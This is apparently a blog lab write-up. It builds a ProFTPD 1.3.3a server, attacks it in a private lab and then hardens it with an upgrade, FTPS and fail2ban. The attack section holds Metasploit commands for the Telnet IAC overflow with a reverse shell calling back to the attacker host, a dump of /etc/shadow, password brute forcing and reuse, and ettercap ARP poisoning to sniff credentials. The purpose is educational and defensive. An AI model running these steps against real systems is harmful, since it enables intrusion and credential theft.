The commands used were (without the hash sign) (proftpd, 2011):
# cd /usr/local/src
# wget -c 'ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.3a.tar.bz2'
[2] For compilation of the source code, development libraries and compilers need to be installed on the CentOS machine. They were installed using the following command (proftpd, 2013):
# yum -y groupinstall 'Development tools'
[2] The ProFTP server runs as a non-privileged user on the Linux system for security reasons. A group called ftpd was created and then a user called ftpd was also created that belonged to the ftpd group. The following commands were used:
# cd /usr/local/src
# wget -c 'ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.3a.tar.bz2'
[2] For compilation of the source code, development libraries and compilers need to be installed on the CentOS machine. They were installed using the following command (proftpd, 2013):
# yum -y groupinstall 'Development tools'
[2] The ProFTP server runs as a non-privileged user on the Linux system for security reasons. A group called ftpd was created and then a user called ftpd was also created that belonged to the ftpd group. The following commands were used:
Command
Used
|
Purpose
|
groupadd ftpd
|
Creates a new group called ftpd and populates the /etc/group file.
|
useradd –g ftpd ftpd
|
Creates a new user called ftpd that has ftpd as its primary group (specified by the
–g parameter) and populates the /etc/passwd file.
|
[3] Once the user and
group ftpd were added the next step was to compile the source code of the
ProFTP server to produce the proftpd binary which support the FTP (File
Transport Protocol). The following commands were used to achieve this (proftpd,
2011) :
Command Used
|
Purpose
|
cd /usr/local/src
|
Change directory to the location
/usr/local/src where the source code of the ProFTP has been downloaded.
|
tar -jxf proftpd-1.3.3a.tar.bz2
|
The tar command uncompressed the proftpd-1.3.3a.tar.bz2 BZIP2 file. The command
options are as follows :
·
-j -> The file input is
in BZIP2 format
·
x -> extract
·
f -> this argument is
followed by the compressed filename
|
cd proftpd-1.3.3a
|
Change directory into the
uncompressed folder proftpd-1.3.3a
|
Command Used (continued..)
|
Purpose
|
install_user=ftpd install_group=ftpd ./configure
--prefix=/usr
--sysconfdir=/etc
|
This command runs a shell script
called configure in the current directory. This script checks the build
dependencies and the machine architecture on which the software is going to
compile. The main task of this command is to generate a file called
“Makefile”. The “Makefile” contains the compilation and installation
instructions that is read by the make command. The install_user and
install_group commands instructs the configure utility that the user and
group used by the proftpd are ftpd and ftpd respectively. The prefix=/usr
instructs the configure utility that the binaries should be installed on /usr
directory rather than /usr/local directory (default). Finally, the
sysconfdir=/etc instructs the configure script that the configuration files
should be installed in the /etc directory.
|
Make
|
This command compiles the binary as per
the instructions loaded in the Makefile.
|
make install
|
This command installs the compiled binaries which includes the ProFTP
daemon called proftpd.
|
[3] Once the binaries were
compiled the location of proftpd was found out using the following command:
# which proftpd
The version was also
checked using the following command:
#/usr/sbin/proftpd –v
[4] The main configuration
file of the proftpd server called proftpd.conf, which is located at /etc was
edited using vi editor. The final configuration file looked like the following
(Petersen , 2010).The configuration is heavily commented (comments starts with
# sigh) for explanation:
In the same file has the
configuration directive starting with <Anonymous ~ftp> and ending with
</Anonymous> and all the directives inside it were commented out (by
putting hash sign in front of the configuration) to disable anonymous FTP
service on the proftpd server (Petersen
, 2010).
The final configuration
file only allows local Linux accounts/users (users defined by the /etc/passwd )
and chroot (restricts) them to their home directory so that they cannot break
out of that directory.
[5] Since, the proftpd
daemon is configured to support local Linux account and to chroot user to
his/her home directory, a new user called prithak with password password was
added into the Linux system for testing. The following commands were used :
# userad prithak
# passwd prithak (enter
password prithak twice)
Similarly, another user
was also added to the system called Daniel. Finally, now we have the following
users on the system:
Username
|
Password
|
prithak
|
1234qwer
|
daniel
|
1a2b3c
|
chintan
|
a1b2c3d4
|
[6] The ProFTP server
(192.168.79.135) was started in debugging mode and was accessed from the
windows machine (192.168.79.1) using the windows in-built ftp command. The user
prithak (having password prithak) was able to successfully log into the ProFTPD
server and at the same time the proftpd server produced debugging logs on the
standard output to confirm the details of the login(Petersen, 2010).
The proftpd was started
using the following command line options (Petersen, 2010):
proftpd -n -d 4 -c /etc/proftpd.conf --ipv4
The options are as
follows:
-n
Runs the proftpd process in standalone
mode (must be configured as such in the configuration file), but does not
background the process or disassociate it from the controlling tty. Additionally, all output (log or debug
messages) are sent to stderr, rather
than the syslog mechanism.
-d
Runs the proftpd server in debugging
mode. The 4 parameter increases the verbosity of the logging to 4.
-c
/etc/proftpd.conf
Instructs the proftpd daemon to read the
configuration file located at /etc/proftpd.conf.
--ipv4
Instructs the proftpd daemon to listen
only on IPV4 addresses i.e. disabled IPV6 (if present).
[7] To ensure that the
ProFTP server running on
(192.168.79.135) starts every time the Linux is restarted the
initialization script (init script) that comes with the source of the ProFTP
was copied to the CentOS INIT V (initialization system V) script directory
(/etc/rc.d/init.d). Then the script was made executable. Finally, the proftpd
service was turned on using chkconfig command.
# cp /usr/local/src/proftpd-1.3.3a/contrib/dist/rpm/proftpd.init.d
/etc/rc.d/init.d/proftpd
# chmod 775 /etc/rc.d/init.d/proftpd
# chkconfig proftpd on
RECONNAISSANCE, FOOTPRINTING and
EXPLOITATION
[1] RECONNAISSANCE and FOOTPRINTING
The first step in every
vulnerability assessment is to find what services are running and the version
of the service this is called reconnaissance and footprinting . To complete
this step a port scan against the target machine should be launched. Following
the same principal, nmap port scanner was launched against the machine using
the following parameters (EC-Council, 2010):
root@bt:~# nmap
-sS -PN -n -sV -sC 192.168.79.135
The Nmap scan result
indicated that the remote machine has two open ports : 22 (SSH) and 21 (FTP).
Also, the version of the FTP server running on the remote machine is ProFTPD
1.3.3a and that of SSH is OpenSSH 5.3. Also, the SSH server only supports SSH
protocol version 2.0.
[2]
BUFFER OVERFLOW ATTACK AGAINST THE PROFTPD SERVICE
When known vulnerabilities
for the ProFTPD 1.3.3a was searched on the internet , the following results were
obtained :
The vulnerability
“CVE-2010-4221” was identified to be affecting the version of ProFTPD 1.3.3.a
that we were running. According to the site “Multiple
stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in
ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via
vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS
server.”
Similar, when exploits for
the CVE-2010-4221 was searched on the internet it lead to the following
metasploit exploit : “ProFTPD 1.3.2rc3 -
1.3.3b Telnet IAC Buffer Overflow (Linux)”. The screenshot of the same is shown
below :
To successfully exploit
the remote machine running the vulnerable version of ProFTPD , metasploit was
launched using the following commands in Backtrack Linux system (Kennedy et al.,
2011):
root@bt:~# cd /opt/metasploit/msf3
root@bt:/opt/metasploit/msf3# ./msfconsole
root@bt:/opt/metasploit/msf3# ./msfconsole
The exploit for the
vulnerable version of ProFTPD running on 192.168.79.135 was loaded using the
following command (commands are in color red) (Kennedy et al.,2011):
msf > use exploit/linux/ftp/proftp_telnet_iac
msf exploit(proftp_telnet_iac) > set RHOST 192.168.79.135
RHOST =>
192.168.79.135
msf exploit(proftp_telnet_iac) > set payload linux/x86/shell_reverse_tcp
msf
exploit(proftp_telnet_iac) > set LHOST
192.168.79.144
LHOST => 192.168.79.144
msf
exploit(proftp_telnet_iac) > exploit –j
Metasploit Command
|
Description
|
use
exploit/linux/ftp/proftp_telnet_iac
|
Loads the proftp_telnet_iac exploit into the current context.
|
set RHOST 192.168.79.135
|
The target host of the exploit i.e. the IP address of the vulnerable
machine.
|
set payload linux/x86/shell_reverse_tcp
|
The shell code that will be executed after successful exploitation.
Here the reverse shell payload is chosen. The reverse shell payload connects
back to the attacker after the exploit is successful. The IP to which the
exploit should connect back is set by the LHOST parameter.
|
set LHOST 192.168.79.144
|
The IP address of the attacker
|
exploit –j
|
Launch the exploit as a background session
|
As a result of successful
exploitation, reverse shell was
obtained on 192.168.79.135 (ProFTP) server.
A new session was created for the shell which could be listed using
“session –l” command in the metasploit console.
To interact with the
session, the “session –i 1” command was used. To check the privilege level of
the user who has triggered the reverse shell the following command were used:
1.
id
This command prints the effective user id of the user. The output showed that we had uid 0 and gid 0 i.e. we were root user.
2.
whoami
This command is used to print the user
friendly name of the current user. The output of this command also confirmed
that we had root access in the machine.
Since,
were had the privileges of the super user (root) we were also able to dump the
/etc/shadow file which contains the password hashes of various users in the
system and is only readable/writeable by the root user. The following
screenshot shows the interaction:
[2] Brute Force and Password re-use
attack against the ProFTP Server
To carry out password
brute force attack against the ProFTP server, the following Python script was
written. This script tries to brute force the password of users prithak,
chintan and daniel. The default password file that comes with bracktrack is
used as the password database file.
Using the above python
script the password of the FTP users’ prithak, chintan and daniel were brute
forced and obtained successfully. The following screenshot shows the password
obtained:
Since, most systems use
the same username and password for multiple services. The username and
passwords that were obtained from the previous attacks were used against the
SSH server running on the same server. This attack is also called “password
reuse-attack” (Harper,2011). The password reuse-attack was successful and the
above obtained credentials were also valid for SSH login. The following
screenshot shows the successful SSH login:
[3] ARP Poisoning and Password
Sniffing Attack
Since, FTP protocol sends
username and passwords in clear text, it is susceptible to password sniffing
attacks. In this attack the following IP machines are involved:
192.168.79.135 ProFTP
Server (FTP Server)
192.168.79.144 Backtrack
(Attacker)
192.168.79.150 Windows XP (FTP Client)
The following screenshot
shows the Address Resolution Protocol table in the Windows XP host before the
ARP poisoning attack is launched:
It can be seen that the
all the hosts have different MAC addresses associated with them. Now since the
attacker is on the same LAN segment as the FTP server and the FTP client, it is
possible for the attacker to launch ARP poisoning attack so that he can sit in
the middle of the FTP exchanges and sniff the password. To do this the
following steps were performed on the attacker’s machine:
(1) Enabled
IP forwarding on the attackers machine so that it can route the traffic between
the FTP Server and FTP Client. This is done using the following command (Anon,
2008) :
# echo 1 >
/proc/sys/net/ipv4/ip_forward
(2) Ettercap
utility was used to launched ARP poisoning attack against both the and the
192.168.79.150 [ Windows XP (FTP Client)] and 192.168.79.135 ProFTP Server (FTP Server) . The following
command was used (Anon, 2008):
# ettercap --iface eth4
--text --quiet --mitm arp
/192.168.79.150/ /192.168.79.135/
(1) The following screenshot shows the ARP table on the Windows
XP machine before and after the attack was launched :
(4) Now when the Client logs into the FTP Server the etteracap
utility grabs the password and prints them.
COUNTERMEASURES
[1]
COUNTERMEASURE AGAINST BUFFER OVERFLOW EXPLOIT
Since, the older version of Proftpd is being run on the system , the most effective countermeasure is to install the latest version of the same software. Another countermeasure is to install a more secure version of FTP server that has a very good security track record. The pureftpd server seems to have a better security track record that proftpd server.
To apply the countermeasure we choose to upgrade the PureFTPD into the latest version. This was done following similar steps that were used to install the older version of ProFTPD. The steps used were:
The running version of the profptd server was stopped using the following command :
#
service proftpd stop
The older version of the ProFTPD server was removed by entering its source directory and using the “make deinstall” command.
# cd /usr/local/src/proftpd-1.3.3a
# make deinstall
·
The latest version of the
source code of proftpd server was downloaded and its MD5 checksum verified
using md5sum command. The following screenshots shows the interaction :
·
The newer version of ProFTPD
was compiled and installed using the following commands (Proftpd, 2011) :
# tar zxvf proftpd-1.3.5rc2.tar.gz
# cd proftpd-1.3.5rc2
# install_user=ftpd install_group=ftpd ./configure --prefix=/usr --sysconfdir=/etc --with-modules=mod_tls
# make
# make install
# cd proftpd-1.3.5rc2
# install_user=ftpd install_group=ftpd ./configure --prefix=/usr --sysconfdir=/etc --with-modules=mod_tls
# make
# make install
[ N.B. : All these commands and their usage have been
explained already when the older versions of ProFTPD was installed. The mod_tls
option enables FTP over SSL/TLS (FTPS) protocol support. ]
·
When the version of
proftpd was checked it came out to be
ProFTPD Version 1.3.5rc2.
·
The latest version of
proftpd was started and then lsof command was used to verify that FTP server
was running :
It was also possible to login into the FTP using the same username and passwords that were used earlier. This proved that the upgraded FTP service was indeed working perfectly. When the same exploit that was used previously was launched against that ProFTPD server using metasploit it failed. This verified that the service was patched. Also, at the time of writing no known exploits (local or remote) exists for the ProFTPD server version 1.3.5-rc2 that we are running.
[2] COUNTERMEASURE AGAINST PASSWORD
SNIFFING AND PASSWORD RE-USE ATTACK
The FTP protocol can be secured by using the FTP over SSL
(FTPS) protocol. The following steps can be performed to enable FTPS :
(1) Generate SSL/TLS certificates using the OpenSSL utility that
comes with Linux (Falko, 2011) :
# mkdir /etc/ssl_certs/
# openssl req -new -x509
-days 730 -nodes -out \
/etc/ssl_certs/proftpd.cert.pem -keyout
/etc/ssl_certs/proftpd.key.pem
The
–days 730 ensures that the certificate is valid for 730 days or two years.
(1) The ProFTPD server was configured to support FTPS protocol by
editing the /etc/proftpd.conf configuration file. Also, the plaintext FTP
protocol was disabled and FTPS was enforced. Now ProFTPD will reject plaintext
FTP connections. The following screenshot shows the added lines with comments
and explanation (Falko, 2011) :
(1) Once, the configuration was completed. ProFTPD daemon was
restarted using the “service proftpd
restart” command. Now when the Windows 7 inbuilt FTP.EXE client was used to connect to the server using the plaintext
FTP protocol , the server rejected the connection with error message
“550 SSL/TLS required on
the control channel”.
(4) To test the login FileZILLA FTP client was installed and it was able to successfully login to the ProFTPD server using SSL/TLS. However, a warning message related to the certificate was shown. This is due to the fact that the certificate is self signed. Once the certificate was accepted, on successive logins there were no errors.
Also, passwords used for FTP server should be secure and strong. The FTP users should have their shell changed to /bin/false which will ensure that the FTP users will not be able to login over SSH, telnet or TTY sessions. This was done using the following commands (Bauer, 2005):
# chsh -s /bin/false prithak
# chsh -s /bin/false daniel
# chsh -s /bin/false chintan
# echo /bin/false >> /etc/shells
# chsh -s /bin/false daniel
# chsh -s /bin/false chintan
# echo /bin/false >> /etc/shells
[3] COUNTERMEASURE AGAINST
PASSWORD BRUTEFORCE ATTACK
To defend against password brute force attack the following
steps were taken:
1.
Strong password were
chosen and passwords of the users’ were upgraded. The following commands were
used :
# passwd prithak ( when prompted for
password alj234wkjw&82jlk2133
was entered two times)
# passwd chitan ( when prompted for
password 234aj%2]32[maere was
entered two times)
# passwd daniel ( when prompted for
password ;8@#%2./ere$*.0* was
entered two times)
2.
Fail2ban utility was
installed and configured on the ProFTPD system. The Fail2ban utility can detect
and prevent password brute force attack(s) by blocking the IP address (es) of
the attacker. It checks the proftpd log (/var/log/secure) and based on the
configuration automatically inserts iptables firewall rule(s) to block the
offending IP address. The following steps were taken to install and configure
the fail2ban with ProFTPD :
(a) Fail2ban was installed using the following commands
(Selvaganeshan, 2010) :
# rpm -ivh
epel-release-6-8.noarch.rpm
# yum install -y fail2ban
(b) The /etc/fail2ban/jail.conf
file was edited and the following parameters were changed (Selvaganeshan, 2010)
:
bantime = 600
maxretry = 4
The bantime defines the number of seconds to block the attackers IP and the maxretry parameter is the number of failures allowed before the IP is blocked. So, in this case if any IP has more than 4 failed logins then it is banned. Similarly, monitoring of ProFTPD logs was also enabled in the “proftpd-iptables” section:
(a)
Then the
fail2ban service was restarted using the following command :
# /etc/init.d/fail2ban restart
At the beginning no IP address was blocked by fail2ban with the help from iptables. The default rule set in fail2ban-ProFTPD chain was empty as shown below:
(d)
When FTP
password brute force attack is carried out from IP address 192.168.79.222
(backtrack) on the ProFTPD server (192.168.79.135), the attack is detected and
the IP address of the attacker is blocked :
The iptables rule to block the IP 192.168.79.222 which was inserted by fail2ban is highlighted below :
CONCLUSION
ProFTPD server was installed from source and attacked using buffer overflow exploit , password sniffing and password brute forcing attacks. Also, the service was secured using compulsory SSL/TLS certificates, Fail2ban intrusion detection system and by upgrading the service to the latest version.
REFERENCES
1. Falko, D. (2011). Setting Up ProFTPd + TLS On Debian Squeeze. Available at: http://www.howtoforge.com/setting-up-proftpd-tls-on-debian-squeeze. (Accessed on: 7th May 2013)
2. Kennedy, D. (2011). Metasploit: The Penetration Tester's Guide. First Edition. No Starch Press.
3. Petersen, R. (2010). Fedora 14 Networking and Servers. Edition. Surfing turtle press.
4. Proftpd (2011). Compiling ProFTPD . Available at: http://www.proftpd.org/docs/howto/Compiling.html. (Accessed on: 21st April 2013).
Authors : Chintan Gurjar and Prithak Sharma
This post if co-authored by Prithak Sharma who is a IT Security Specialist interested in network Security and Pen-testing who can be contacted at prithak[at]gmail [dot]com. He runs his blog at prithak.blogspot.com.
Authors : Chintan Gurjar and Prithak Sharma
This post if co-authored by Prithak Sharma who is a IT Security Specialist interested in network Security and Pen-testing who can be contacted at prithak[at]gmail [dot]com. He runs his blog at prithak.blogspot.com.
No comments:
Post a Comment